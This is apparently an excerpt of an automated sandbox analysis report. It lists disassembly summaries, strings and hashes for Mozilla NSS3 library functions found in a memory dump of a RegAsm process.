fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C1E6F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C1E6BF7), ref: 6C1E6F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C1E6BF7), ref: 6C1E6F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C1E6BF7), ref: 6C1E6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C1E6BF7), ref: 6C1E6FFD

Strings

NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C1E6FDB
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C1E6F4F
SSLFORCELOCKS, xrefs: 6C1E6F2B
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C1E6FF8
SSLKEYLOGFILE, xrefs: 6C1E6EB1
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C1E6EF7

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: ec471b18ececc2e23961506466a4c169b5c1a64a0c2af7dc45d1b89830ef6399
Instruction ID: ed4bfa0f75ec41453ab789ce5a999eccb71f8f55f1bcdd4d0eb707277b491794
Opcode Fuzzy Hash: ec471b18ececc2e23961506466a4c169b5c1a64a0c2af7dc45d1b89830ef6399
Instruction Fuzzy Hash: 7EA137B2A55D8687F750463CCD1478432F2AB9F32DF5883A6ED31C6ED6DB399480C285

Function 6C184E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C184E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C184EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C184EC7

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C184EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C184F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C184F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C184F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C184F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C184F68

Strings

hObject = 0x%x, xrefs: 6C184EF5, 6C184F05
(CK_INVALID_HANDLE), xrefs: 6C184EC0, 6C184F13
hSession = 0x%x, xrefs: 6C184EA2, 6C184EB2
pTemplate = 0x%p, xrefs: 6C184F4A
ulCount = %d, xrefs: 6C184F63
C_GetAttributeValue, xrefs: 6C184E7E
n&l, xrefs: 6C184F82, 6C184FB2

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$n&l
API String ID: 1003633598-3207277051
Opcode ID: c8793718b14b47127838c4667c627768da8ad8db51f11b6537f94b9a0f8c4725
Instruction ID: 15891205811c29f27b8a8d31c7b82d628cd572d968ccfe08a2e1a2ecd7064437
Opcode Fuzzy Hash: c8793718b14b47127838c4667c627768da8ad8db51f11b6537f94b9a0f8c4725
Instruction Fuzzy Hash: B4410674606108ABDB00CB19DD8CF9A77B9AB4230DF044468ED086BA92DF34A948CFB5

Function 6C184CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C184CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C184D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C184D37

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C184D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C184D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C184D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C184DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C184DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C184E20

Strings

C_GetObjectSize, xrefs: 6C184CEE
hObject = 0x%x, xrefs: 6C184D65, 6C184D75
(CK_INVALID_HANDLE), xrefs: 6C184D30, 6C184D83
hSession = 0x%x, xrefs: 6C184D12, 6C184D22
*pulSize = 0x%x, xrefs: 6C184E1B
pulSize = 0x%p, xrefs: 6C184DB7
n&l, xrefs: 6C184DD4, 6C184DFF

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$n&l
API String ID: 1003633598-2857240306
Opcode ID: d2631f6e1603df103bf22040e3f18df7bf19a22941e882e7dc4dc0bb199615e7
Instruction ID: 00777a3a5a04ef418277062232769d7a7aecdfbaea796de17a4626f6d64ae420
Opcode Fuzzy Hash: d2631f6e1603df103bf22040e3f18df7bf19a22941e882e7dc4dc0bb199615e7
Instruction Fuzzy Hash: DE41E7B1606208AFD700DB14DDDCB6A37B9EB5270DF058425FD096BA92DF34A848CFA5

Function 6C187C90 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6C187CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C187CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C187CF3

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C187D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C187D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C187D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C187D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C187D77

Strings

ulSignatureLen = %d, xrefs: 6C187D72
(CK_INVALID_HANDLE), xrefs: 6C187CEC
hSession = 0x%x, xrefs: 6C187CCE, 6C187CDE
ulDataLen = %d, xrefs: 6C187D40
pData = 0x%p, xrefs: 6C187D25
C_Verify, xrefs: 6C187CB1
pSignature = 0x%p, xrefs: 6C187D59
n&l, xrefs: 6C187D8F, 6C187DC3

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify$n&l
API String ID: 1003633598-1255557411
Opcode ID: 9d5fcb0954c6fc94c4ca9534505d053dc98855de3a70a5901de99dc11ba130c2
Instruction ID: cbf2957e906c232e2049fb10a4f5976aaf6ebb424c9671f33a47cb0e96efd309
Opcode Fuzzy Hash: 9d5fcb0954c6fc94c4ca9534505d053dc98855de3a70a5901de99dc11ba130c2
Instruction Fuzzy Hash: 9C31D2B5702149AFDB10CB54DD8CF6A77B2AB4230CF084425FC086BA92DB30A848CBA5

Function 6C182F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C182F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C182F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C182F63

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C182F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C182F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C182FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C182FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C182FE7

Strings

(CK_INVALID_HANDLE), xrefs: 6C182F5C
ulOldLen = %d, xrefs: 6C182FB0
hSession = 0x%x, xrefs: 6C182F3E, 6C182F4E
C_SetPIN, xrefs: 6C182F21
pOldPin = 0x%p, xrefs: 6C182F95
ulNewLen = %d, xrefs: 6C182FE2
n&l, xrefs: 6C182FFF, 6C183030
pNewPin = 0x%p, xrefs: 6C182FC9

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$n&l
API String ID: 1003633598-1461049437
Opcode ID: 27e1063e399a02919449f50c3606bf68477f50b2c6996bd95b6d94c21d81b7a4
Instruction ID: 1fb7ad958631e815ecb974e9545b13fe18e138554f8f85e29f6cdad65650c0d5
Opcode Fuzzy Hash: 27e1063e399a02919449f50c3606bf68477f50b2c6996bd95b6d94c21d81b7a4
Instruction Fuzzy Hash: DE31E3B5606248AFCB01CB55DD8CF4A37B2EB4670DF484054EC08ABAD2DB30A848DBA5

Function 6C269C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6C269C70
PR_NewLock.NSS3 ref: 6C269C85

Part of subcall function 6C2198D0: calloc.MOZGLUE(00000001,00000084,6C140936,00000001,?,6C14102C), ref: 6C2198E5

PR_NewCondVar.NSS3(00000000), ref: 6C269C96

Part of subcall function 6C13BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C1421BC), ref: 6C13BB8C

PR_NewLock.NSS3 ref: 6C269CA9

Part of subcall function 6C2198D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C219946
Part of subcall function 6C2198D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D16B7,00000000), ref: 6C21994E
Part of subcall function 6C2198D0: free.MOZGLUE(00000000), ref: 6C21995E

PR_NewLock.NSS3 ref: 6C269CB9
PR_NewLock.NSS3 ref: 6C269CC9
PR_NewCondVar.NSS3(00000000), ref: 6C269CDA

Part of subcall function 6C13BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C13BBEB
Part of subcall function 6C13BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C13BBFB
Part of subcall function 6C13BB80: GetLastError.KERNEL32 ref: 6C13BC03
Part of subcall function 6C13BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C13BC19
Part of subcall function 6C13BB80: free.MOZGLUE(00000000), ref: 6C13BC22

PR_NewCondVar.NSS3(?), ref: 6C269CF0
PR_NewPollableEvent.NSS3 ref: 6C269D03

Part of subcall function 6C25F3B0: PR_CallOnce.NSS3(6C2B14B0,6C25F510), ref: 6C25F3E6
Part of subcall function 6C25F3B0: PR_CreateIOLayerStub.NSS3(6C2B006C), ref: 6C25F402
Part of subcall function 6C25F3B0: PR_Malloc.NSS3(00000004), ref: 6C25F416
Part of subcall function 6C25F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C25F42D
Part of subcall function 6C25F3B0: PR_SetSocketOption.NSS3(?), ref: 6C25F455
Part of subcall function 6C25F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C25F473

Part of subcall function 6C219890: TlsGetValue.KERNEL32(?,?,?,6C2197EB), ref: 6C21989E

EnterCriticalSection.KERNEL32(?), ref: 6C269D78
calloc.MOZGLUE(00000001,0000000C), ref: 6C269DAF
_PR_CreateThread.NSS3(00000000,6C269EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C269D9F

Part of subcall function 6C13B3C0: TlsGetValue.KERNEL32 ref: 6C13B403
Part of subcall function 6C13B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C13B459

_PR_CreateThread.NSS3(00000000,6C26A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C269DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6C269DFC
_PR_CreateThread.NSS3(00000000,6C26A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C269E29
calloc.MOZGLUE(00000001,0000000C), ref: 6C269E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6C269E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C269E89

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 924d318f3ae93a79b32c82fe86ea18cfc3c28ff7411a45db6e9a46dfdc97ab62
Instruction ID: 747b7dc0a91d10129cb28b442c6f17ff1ffc0bccc25ec7114743c20b466c3197
Opcode Fuzzy Hash: 924d318f3ae93a79b32c82fe86ea18cfc3c28ff7411a45db6e9a46dfdc97ab62
Instruction Fuzzy Hash: 15613EB1D0070AAFD710DF75D844AA7BBE8FF08209B04452AE959C7F51EB31E464CBA1

Function 6C1A8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C1A8E01,00000000,6C1A9060,6C2B0B64), ref: 6C1A8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C1A8E01,00000000,6C1A9060,6C2B0B64), ref: 6C1A8E9E
PORT_ArenaAlloc_Util.NSS3(6C2B0B64,00000001,?,?,?,?,6C1A8E01,00000000,6C1A9060,6C2B0B64), ref: 6C1A8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C1A8E01,00000000,6C1A9060,6C2B0B64), ref: 6C1A8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C1A8E01,00000000,6C1A9060,6C2B0B64), ref: 6C1A8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C1A8E01,00000000,6C1A9060,6C2B0B64), ref: 6C1A8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C1A8E01), ref: 6C1A8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C2B0B64,6C2B0B64), ref: 6C1A8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C1A8F3F

Part of subcall function 6C1AA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C1AA421,00000000,00000000,6C1A9826), ref: 6C1AA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1A904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C1A8E76

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: eb66dca3de3a88ded56002112d92a22345870e2c8dbc346f3f620dab195cb80d
Instruction ID: f1c1129f143fb2110a7c1ff5c962564b39dbe2b561875fda7793e4e1d356b6cb
Opcode Fuzzy Hash: eb66dca3de3a88ded56002112d92a22345870e2c8dbc346f3f620dab195cb80d
Instruction Fuzzy Hash: 066185B9D0010A9FDB10CF96CD80AABB7B9EF94358F154128DC18A7741E736E956CBB0

Function 6C158E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C158E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C158E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C158EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C2818D0,?), ref: 6C158F03
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C158F19
PL_FreeArenaPool.NSS3(?), ref: 6C158F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C158F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C158F65
PL_FinishArenaPool.NSS3(?), ref: 6C158FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C158FFE
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C159012
PL_FreeArenaPool.NSS3(?), ref: 6C159024
PL_FinishArenaPool.NSS3(?), ref: 6C15902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C15903E

Strings

security, xrefs: 6C158EE7

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 9be1d619252334ec6686e6970f6e1d1dd87b1ce356520ddfc297fa95ee785bf6
Instruction ID: aaecd1851c01ca392002bcad25adc8371c9e5efb4810ba4f0f39afc26f42808e
Opcode Fuzzy Hash: 9be1d619252334ec6686e6970f6e1d1dd87b1ce356520ddfc297fa95ee785bf6
Instruction Fuzzy Hash: EC5149F1648300ABF7109A549C45FAB73E8EB9575CF95082EF864A7B80E732D819C763

Function 6C21CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C21CC7B), ref: 6C21CD7A

Part of subcall function 6C21CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C18C1A8,?), ref: 6C21CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C21CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C21CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C21CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C21CD8E

Part of subcall function 6C1405C0: PR_EnterMonitor.NSS3 ref: 6C1405D1
Part of subcall function 6C1405C0: PR_ExitMonitor.NSS3 ref: 6C1405EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C21CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C21CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C21CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C21CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C21CE48

Strings

wship6.dll, xrefs: 6C21CDE3
freeaddrinfo, xrefs: 6C21CD9F, 6C21CE10
getaddrinfo, xrefs: 6C21CD88, 6C21CDF9
ws2_32.dll, xrefs: 6C21CD75
getnameinfo, xrefs: 6C21CDB2, 6C21CE23

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 43989a94195e8c943aba1da4ea02783eae1bc5a50b2ff92e59dec77dfc83a5df
Instruction ID: 0e622a3fc237e1aea4292c902cf80b9144475590540fd8ff4da948ced41823ad
Opcode Fuzzy Hash: 43989a94195e8c943aba1da4ea02783eae1bc5a50b2ff92e59dec77dfc83a5df
Instruction Fuzzy Hash: 181129AEE1711B52EB006A322C04AAE3CD89B1350DF584638ED05D5FC1FB21C54DC3E6

Function 6C261C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C2613BC,?,?,?,6C261193), ref: 6C261C6B
PR_NewLock.NSS3(?,6C261193), ref: 6C261C7E

Part of subcall function 6C2198D0: calloc.MOZGLUE(00000001,00000084,6C140936,00000001,?,6C14102C), ref: 6C2198E5

PR_NewCondVar.NSS3(00000000,?,6C261193), ref: 6C261C91

Part of subcall function 6C13BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C1421BC), ref: 6C13BB8C

PR_NewCondVar.NSS3(00000000,?,?,6C261193), ref: 6C261CA7

Part of subcall function 6C13BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C13BBEB
Part of subcall function 6C13BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C13BBFB
Part of subcall function 6C13BB80: GetLastError.KERNEL32 ref: 6C13BC03
Part of subcall function 6C13BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C13BC19
Part of subcall function 6C13BB80: free.MOZGLUE(00000000), ref: 6C13BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6C261193), ref: 6C261CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6C261193), ref: 6C261CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C261193), ref: 6C261CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6C261193), ref: 6C261D1A

Part of subcall function 6C219BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C141A48), ref: 6C219BB3
Part of subcall function 6C219BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C141A48), ref: 6C219BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C261193), ref: 6C261D3D

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

